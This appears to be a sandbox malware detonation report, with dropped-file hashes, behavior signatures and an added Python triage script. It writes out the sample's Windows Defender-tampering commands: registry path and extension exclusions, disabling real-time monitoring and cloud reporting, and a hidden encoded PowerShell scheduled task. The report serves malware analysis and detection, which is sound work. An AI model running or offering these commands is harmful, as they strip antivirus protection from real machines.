C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\aFevMsDBlqIRbqTyh" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\grMXAHIUMHIHAuvw" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\grMXAHIUMHIHAuvw" /t REG_DWORD /d 0 /reg:64
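
Every reg.exe line above is a Windows Defender configuration change, issued twice so that it lands in both registry views (/reg:32 and /reg:64), which is also why the signature tables list each change under the native key and again under Wow6432Node. Path exclusions are stored as a REG_DWORD whose name is the excluded directory and whose data is 0, under HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths for the local configuration and under HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths for the Group Policy equivalent; the installer writes both, adds an extension exclusion for exe, sets DisableRealtimeMonitoring = 1 and turns off cloud sample reporting with SpyNetReporting = 0. The -EncodedCommand argument carried by the three schtasks /TR entries is base64 of UTF-16LE text and decodes to start-process -WindowStyle Hidden gpupdate.exe /force, which applies the Registry.pol written under C:\Windows\System32\GroupPolicy\Machine (the "Drops file in System32 directory" signature) so the policy values take effect without a reboot. The task created with /RU "SYSTEM" and /V1 is what runs rdCtdiR.exe as SYSTEM (taskeng.exe under S-1-5-18 above) and is the origin of the .job file in C:\Windows\Tasks. The script below is an added example, not part of the sandbox report. Over a constructed list of command lines copied from this section, it decodes the encoded command and reduces the REG ADD calls, including the ones nested inside forfiles and cmd /C, to a deduplicated set of Defender-tampering findings.

```python
import base64
import re

# Constructed sample: command lines copied from the process list of this report
# (the forfiles -> cmd -> reg chains, direct reg.exe calls, and one schtasks
# entry carrying the encoded PowerShell).
PROCESS_CMDLINES = [
    r'"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"',
    r'"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"',
    r'schtasks /CREATE /TN "gEhzvxrPb" /SC once /ST 09:41:20 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="',
    r'REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32',
    r'REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64',
    r'"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\SvbbHukzU" /t REG_DWORD /d 0 /reg:32',
    r'"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\aFevMsDBlqIRbqTyh" /t REG_DWORD /d 0 /reg:64',
    r'REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\grMXAHIUMHIHAuvw" /t REG_DWORD /d 0 /reg:32',
]

# PowerShell accepts -e, -ec, -enc and longer prefixes of -EncodedCommand; the
# (?:c|n...) branch keeps -ExecutionPolicy from matching.
ENC_RE = re.compile(r"-e(?:c|n[a-z]*)?\s+([A-Za-z0-9+/=]+)", re.I)


def decode_encoded_command(cmdline):
    """Encoded PowerShell is base64 of UTF-16LE text; None when absent or invalid."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


# Matches both "REG ADD ..." and '"...\reg.exe" ADD ...'; args stop at the & that
# cmd.exe uses to chain the /reg:32 and /reg:64 variants.
REG_ADD_RE = re.compile(
    r'(?:\bREG\b|reg\.exe"?)\s+ADD\s+"(?P<key>[^"]+)"(?P<args>[^&]*)', re.I)


def _opt(args, flag):
    """Value of a reg.exe switch such as /v or /d, quoted or bare."""
    m = re.search(rf'{re.escape(flag)}\s+(?:"([^"]*)"|(\S+))', args, re.I)
    if not m:
        return None
    return m.group(1) if m.group(1) is not None else m.group(2)


def parse_reg_adds(cmdline):
    """Every REG ADD inside a command line, including those forfiles passes on
    with escaped quotes and those cmd.exe chains with &."""
    text = cmdline.replace('\\"', '"')  # undo the \" escaping seen in the forfiles lines
    out = []
    for m in REG_ADD_RE.finditer(text):
        args = m["args"]
        view = re.search(r"/reg:(32|64)", args)
        out.append({
            "key": m["key"],
            "value": _opt(args, "/v"),
            "type": _opt(args, "/t"),
            "data": _opt(args, "/d"),
            "view": view.group(1) if view else "native",
        })
    return out


def classify(entry):
    """Map a REG ADD to a Defender-tampering kind plus whether it hits the
    policy hive (...\\Policies\\Microsoft\\Windows Defender) or the local one."""
    key = entry["key"].lower()
    if "windows defender" not in key:
        return None
    scope = "policy" if "\\policies\\" in key else "local"
    name = (entry["value"] or "").lower()
    if key.endswith("\\real-time protection") and name == "disablerealtimemonitoring" and entry["data"] == "1":
        return "realtime_protection_disabled", scope
    if key.endswith("\\exclusions\\paths"):
        return "exclusion_path", scope
    if key.endswith("\\exclusions\\extensions"):
        return "exclusion_extension", scope
    if key.endswith("\\spynet") and name == "spynetreporting" and entry["data"] == "0":
        return "cloud_reporting_disabled", scope
    return None


def triage(cmdlines):
    """Return (findings, payloads): findings are unique
    (kind, scope, value_name, registry_view) tuples, payloads the decoded scripts."""
    findings = {}
    payloads = set()
    for cmd in cmdlines:
        decoded = decode_encoded_command(cmd)
        if decoded:
            payloads.add(decoded)
        for entry in parse_reg_adds(cmd):
            hit = classify(entry)
            if hit:
                kind, scope = hit
                fkey = (kind, scope, entry["value"], entry["view"])
                findings[fkey] = findings.get(fkey, 0) + 1
    return sorted(findings), sorted(payloads)


if __name__ == "__main__":
    findings, payloads = triage(PROCESS_CMDLINES)
    for script in payloads:
        print("decoded PowerShell:", script)
    for kind, scope, name, view in findings:
        print(f"{kind:30} {scope:6} view={view:6} {name}")
```

Two caveats when turning this into host checks. These writes took effect because the detonation platform was win7-20220901-en; on current Windows 10 and 11 builds with Tamper Protection enabled, registry writes that turn off real-time protection or cloud-delivered protection (DisableRealtimeMonitoring, SpyNetReporting) are blocked. And when cleaning up, inspect both the Microsoft\Windows Defender and the Policies\Microsoft\Windows Defender keys in both registry views, then confirm with Get-MpPreference that ExclusionPath and ExclusionExtension are empty, because an exclusion left in either hive keeps the dropped directories invisible to scans.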

Network

Country Destination Domain Proto
NL 65.9.86.47:443 tcp

Files

memory/1380-54-0x00000000757A1000-0x00000000757A3000-memory.dmp

\Users\Admin\AppData\Local\Temp\7zS166E.tmp\Install.exe

MD5 bd35df49cacc0d3f9c3db5d688438580
SHA1 364ac175e546fe6db9d7b07f52b1901b3b8f0ee8
SHA256 d5030b6c215b8e54b9dcc25a3da215475abfd4323d8cbb8bc9912d363f4f6b63
SHA512 7f62e948af40698e4859aa2e10735a02f8cb7df6810594cada99549db0f6f119feed99960e1b2990ac70197d712486e3c70c6947c8b8ba293ea83a657a06c901

C:\Users\Admin\AppData\Local\Temp\7zS166E.tmp\Install.exe

MD5 bd35df49cacc0d3f9c3db5d688438580
SHA1 364ac175e546fe6db9d7b07f52b1901b3b8f0ee8
SHA256 d5030b6c215b8e54b9dcc25a3da215475abfd4323d8cbb8bc9912d363f4f6b63
SHA512 7f62e948af40698e4859aa2e10735a02f8cb7df6810594cada99549db0f6f119feed99960e1b2990ac70197d712486e3c70c6947c8b8ba293ea83a657a06c901

memory/824-56-0x0000000000000000-mapping.dmp

memory/936-64-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\7zS254D.tmp\Install.exe

MD5 6772e7af138504e782c6e77d79080a21
SHA1 f1d34996df460e49dad43a5e14c27d01db59c2a4
SHA256 4ad4db7017f6c5f587cac7c735c91e20a879ad6aa7c6f3a2188cb8ec173a797d
SHA512 07b6119f299b3d396395b249526d3564b58d553e7889659988233260f04b8a425b07762761e9e9631ad3bd06f2ed0688623cc1342a497f60b02ddd3394489180

\Users\Admin\AppData\Local\Temp\7zS254D.tmp\Install.exe

MD5 6772e7af138504e782c6e77d79080a21
SHA1 f1d34996df460e49dad43a5e14c27d01db59c2a4
SHA256 4ad4db7017f6c5f587cac7c735c91e20a879ad6aa7c6f3a2188cb8ec173a797d
SHA512 07b6119f299b3d396395b249526d3564b58d553e7889659988233260f04b8a425b07762761e9e9631ad3bd06f2ed0688623cc1342a497f60b02ddd3394489180

\Users\Admin\AppData\Local\Temp\7zS254D.tmp\Install.exe

MD5 6772e7af138504e782c6e77d79080a21
SHA1 f1d34996df460e49dad43a5e14c27d01db59c2a4
SHA256 4ad4db7017f6c5f587cac7c735c91e20a879ad6aa7c6f3a2188cb8ec173a797d
SHA512 07b6119f299b3d396395b249526d3564b58d553e7889659988233260f04b8a425b07762761e9e9631ad3bd06f2ed0688623cc1342a497f60b02ddd3394489180

\Users\Admin\AppData\Local\Temp\7zS254D.tmp\Install.exe

MD5 6772e7af138504e782c6e77d79080a21
SHA1 f1d34996df460e49dad43a5e14c27d01db59c2a4
SHA256 4ad4db7017f6c5f587cac7c735c91e20a879ad6aa7c6f3a2188cb8ec173a797d
SHA512 07b6119f299b3d396395b249526d3564b58d553e7889659988233260f04b8a425b07762761e9e9631ad3bd06f2ed0688623cc1342a497f60b02ddd3394489180

\Users\Admin\AppData\Local\Temp\7zS254D.tmp\Install.exe

MD5 6772e7af138504e782c6e77d79080a21
SHA1 f1d34996df460e49dad43a5e14c27d01db59c2a4
SHA256 4ad4db7017f6c5f587cac7c735c91e20a879ad6aa7c6f3a2188cb8ec173a797d
SHA512 07b6119f299b3d396395b249526d3564b58d553e7889659988233260f04b8a425b07762761e9e9631ad3bd06f2ed0688623cc1342a497f60b02ddd3394489180

C:\Users\Admin\AppData\Local\Temp\7zS254D.tmp\Install.exe

MD5 6772e7af138504e782c6e77d79080a21
SHA1 f1d34996df460e49dad43a5e14c27d01db59c2a4
SHA256 4ad4db7017f6c5f587cac7c735c91e20a879ad6aa7c6f3a2188cb8ec173a797d
SHA512 07b6119f299b3d396395b249526d3564b58d553e7889659988233260f04b8a425b07762761e9e9631ad3bd06f2ed0688623cc1342a497f60b02ddd3394489180

memory/936-71-0x0000000010000000-0x0000000011000000-memory.dmp

memory/2028-74-0x0000000000000000-mapping.dmp

memory/1328-75-0x0000000000000000-mapping.dmp

memory/1440-78-0x0000000000000000-mapping.dmp

memory/1376-79-0x0000000000000000-mapping.dmp

memory/288-83-0x0000000000000000-mapping.dmp

memory/960-82-0x0000000000000000-mapping.dmp

memory/1580-86-0x0000000000000000-mapping.dmp

memory/592-87-0x0000000000000000-mapping.dmp

memory/780-90-0x0000000000000000-mapping.dmp

memory/1600-92-0x0000000000000000-mapping.dmp

memory/396-94-0x0000000000000000-mapping.dmp

memory/396-95-0x000007FEFB8B1000-0x000007FEFB8B3000-memory.dmp

memory/396-96-0x000007FEF4680000-0x000007FEF50A3000-memory.dmp

memory/396-97-0x000007FEF3B20000-0x000007FEF467D000-memory.dmp

memory/396-98-0x0000000002564000-0x0000000002567000-memory.dmp

memory/964-99-0x0000000000000000-mapping.dmp

memory/396-101-0x000000000256B000-0x000000000258A000-memory.dmp

memory/396-100-0x0000000002564000-0x0000000002567000-memory.dmp

memory/848-102-0x0000000000000000-mapping.dmp

memory/1956-104-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\aFevMsDBlqIRbqTyh\IZVHwqqvKwOqTrb\rdCtdiR.exe

MD5 6772e7af138504e782c6e77d79080a21
SHA1 f1d34996df460e49dad43a5e14c27d01db59c2a4
SHA256 4ad4db7017f6c5f587cac7c735c91e20a879ad6aa7c6f3a2188cb8ec173a797d
SHA512 07b6119f299b3d396395b249526d3564b58d553e7889659988233260f04b8a425b07762761e9e9631ad3bd06f2ed0688623cc1342a497f60b02ddd3394489180

memory/852-107-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\aFevMsDBlqIRbqTyh\IZVHwqqvKwOqTrb\rdCtdiR.exe

MD5 6772e7af138504e782c6e77d79080a21
SHA1 f1d34996df460e49dad43a5e14c27d01db59c2a4
SHA256 4ad4db7017f6c5f587cac7c735c91e20a879ad6aa7c6f3a2188cb8ec173a797d
SHA512 07b6119f299b3d396395b249526d3564b58d553e7889659988233260f04b8a425b07762761e9e9631ad3bd06f2ed0688623cc1342a497f60b02ddd3394489180

C:\Windows\system32\GroupPolicy\gpt.ini

MD5 a62ce44a33f1c05fc2d340ea0ca118a4
SHA1 1f03eb4716015528f3de7f7674532c1345b2717d
SHA256 9f2cd4acf23d565bc8498c989fccccf59fd207ef8925111dc63e78649735404a
SHA512 9d9a4da2df0550afdb7b80be22c6f4ef7da5a52cc2bb4831b8ff6f30f0ee9eac8960f61cdd7cfe0b1b6534a0f9e738f7eb8ea3839d2d92abeb81660de76e7732

memory/1728-114-0x0000000000000000-mapping.dmp

memory/880-115-0x0000000000000000-mapping.dmp

memory/780-116-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 e4e81e7383459810e5f9e82ddcca41bc
SHA1 b000cad6a086d689094a8c868399e1cff283b5e5
SHA256 6ea7933650b6818d2994dcd12103b1e908b8bd9c60f9add973ad1cdc8e31deb7
SHA512 5847469a675bd63818ca9cc29690aac80b3324d86070b8cd48b79bc72dfccb3206c3285da9166b76958d0ed0f931e028bcea319d6c622f95787fcd50c2a58b6c

memory/780-119-0x000007FEF3CE0000-0x000007FEF4703000-memory.dmp

memory/780-120-0x000007FEF3180000-0x000007FEF3CDD000-memory.dmp

memory/1276-121-0x0000000000000000-mapping.dmp

memory/780-123-0x000000000244B000-0x000000000246A000-memory.dmp

memory/780-122-0x0000000002444000-0x0000000002447000-memory.dmp

memory/780-124-0x000000000244B000-0x000000000246A000-memory.dmp

memory/1136-125-0x0000000000000000-mapping.dmp

memory/1780-126-0x0000000000000000-mapping.dmp

memory/2032-127-0x0000000000000000-mapping.dmp

memory/1956-128-0x0000000000000000-mapping.dmp

memory/1696-129-0x0000000000000000-mapping.dmp

memory/2008-130-0x0000000000000000-mapping.dmp

memory/820-131-0x0000000000000000-mapping.dmp

memory/2040-132-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 9c77d8d247582bde507e5eda19a4c85b
SHA1 15d02d823170cd49647e30d7c2ed0750d02eda6a
SHA256 b44cdeea23015a0120aa1880f81f24fc64edcd841d49dbe112739e3b6d52c482
SHA512 52acb02f85ae54e28905aab40981f18d1948d3ba8467bf4d39c9963414b7547529abf7753cb31fabeb8c8126f6ceea4eb4fde4f3a3838dd7284b381cf21dcba1

\??\PIPE\srvsvc

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

memory/2040-136-0x000007FEF4680000-0x000007FEF50A3000-memory.dmp

memory/2040-137-0x000007FEF3B20000-0x000007FEF467D000-memory.dmp

memory/2040-139-0x000000000251B000-0x000000000253A000-memory.dmp

memory/2040-138-0x0000000002514000-0x0000000002517000-memory.dmp

memory/1092-140-0x0000000000000000-mapping.dmp

memory/2040-141-0x0000000002514000-0x0000000002517000-memory.dmp

memory/2040-142-0x000000000251B000-0x000000000253A000-memory.dmp

memory/912-143-0x0000000000000000-mapping.dmp

memory/1916-144-0x0000000000000000-mapping.dmp

memory/1620-145-0x0000000000000000-mapping.dmp

memory/992-146-0x0000000000000000-mapping.dmp

memory/1368-147-0x0000000000000000-mapping.dmp

memory/1948-148-0x0000000000000000-mapping.dmp

memory/1276-149-0x0000000000000000-mapping.dmp

memory/1768-150-0x0000000000000000-mapping.dmp

memory/700-151-0x0000000000000000-mapping.dmp

memory/548-152-0x0000000000000000-mapping.dmp

memory/1780-153-0x0000000000000000-mapping.dmp

C:\Windows\Temp\grMXAHIUMHIHAuvw\tlGPTreK\nLZuwYiwYzzlmmqI.wsf

MD5 0b1e51c9a8b95b9209826b2be06ff26f
SHA1 986bea32d6107f964de3a5f8525ee4cb522780b8
SHA256 80a1b9947818cfece8b24e8458bff8f3a85feb235849315f21be745c2d24cf5b
SHA512 4d0600c981e1cce2479cd6e56025bae003a817fd0f5bda20a9f93b0846d94b269dbd319809ac125e71fdd116ff7ad576ddc7e6d5c197a0c4b3124297c2029e76

memory/1188-156-0x0000000000000000-mapping.dmp

memory/544-157-0x0000000000000000-mapping.dmp

memory/1056-158-0x0000000000000000-mapping.dmp

memory/1440-159-0x0000000000000000-mapping.dmp

memory/1376-160-0x0000000000000000-mapping.dmp

memory/2040-161-0x0000000000000000-mapping.dmp

memory/1124-162-0x0000000000000000-mapping.dmp

memory/1908-163-0x0000000000000000-mapping.dmp

memory/1652-164-0x0000000000000000-mapping.dmp

memory/1700-165-0x0000000000000000-mapping.dmp

memory/1972-166-0x0000000000000000-mapping.dmp

memory/1472-167-0x0000000000000000-mapping.dmp

memory/1648-168-0x0000000000000000-mapping.dmp

memory/812-169-0x0000000000000000-mapping.dmp

memory/276-170-0x0000000000000000-mapping.dmp

memory/1720-171-0x0000000000000000-mapping.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2022-10-31 22:05

Reported

2022-10-31 22:07

Platform

win10v2004-20220812-en

Max time kernel

82s

Max time network

145s

Command Line

"C:\Users\Admin\AppData\Local\Temp\file.exe"

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\7zS696D.tmp\Install.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Windows\SysWOW64\rundll32.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\7zS696D.tmp\Install.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\qSPtVBy.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A

Reads user/profile data of web browsers

spyware stealer

Checks installed software on the system

discovery

Drops Chrome extension

Description Indicator Process Target
File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\manifest.json C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\qSPtVBy.exe N/A

Drops desktop.ini file(s)

Description Indicator Process Target
File opened for modification C:\$RECYCLE.BIN\S-1-5-18\desktop.ini C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\qSPtVBy.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\system32\GroupPolicy\gpt.ini C:\Users\Admin\AppData\Local\Temp\7zS696D.tmp\Install.exe N/A
File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini C:\Users\Admin\AppData\Local\Temp\aFevMsDBlqIRbqTyh\IZVHwqqvKwOqTrb\ZLQwkOe.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\qSPtVBy.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\qSPtVBy.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\qSPtVBy.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B398B80134F72209547439DB21AB308D_A4CF52CCA82D7458083F7280801A3A04 C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\qSPtVBy.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\qSPtVBy.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\3B8C7C973B30115D9F846695C38BBC1F C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\qSPtVBy.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\qSPtVBy.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\qSPtVBy.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\qSPtVBy.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_7D7374C3BD488A38BC34DD9B008EDC62 C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\qSPtVBy.exe N/A
File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol C:\Users\Admin\AppData\Local\Temp\aFevMsDBlqIRbqTyh\IZVHwqqvKwOqTrb\ZLQwkOe.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\qSPtVBy.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\qSPtVBy.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\3B8C7C973B30115D9F846695C38BBC1F C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\qSPtVBy.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\qSPtVBy.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_7D7374C3BD488A38BC34DD9B008EDC62 C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\qSPtVBy.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\qSPtVBy.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\qSPtVBy.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\qSPtVBy.exe N/A
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\qSPtVBy.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B398B80134F72209547439DB21AB308D_A4CF52CCA82D7458083F7280801A3A04 C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\qSPtVBy.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\A16C6C16D94F76E0808C087DFC657D99_A49E2928C282F3D7B74BA1083F81B152 C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\qSPtVBy.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\A16C6C16D94F76E0808C087DFC657D99_A49E2928C282F3D7B74BA1083F81B152 C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\qSPtVBy.exe N/A
File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\qSPtVBy.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files (x86)\SvbbHukzU\xvUjymx.xml C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\qSPtVBy.exe N/A
File created C:\Program Files (x86)\yOvDRBMJNKKU2\ikgbzwgbjtdRP.dll C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\qSPtVBy.exe N/A
File created C:\Program Files (x86)\yOvDRBMJNKKU2\TPakwtl.xml C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\qSPtVBy.exe N/A
File created C:\Program Files (x86)\XYDCXZXPsTrrC\FYPpVvk.xml C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\qSPtVBy.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja.bak C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\qSPtVBy.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\qSPtVBy.exe N/A
File created C:\Program Files (x86)\nolBHjueEzUn\pCVdaPp.dll C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\qSPtVBy.exe N/A
File created C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\qSPtVBy.exe N/A
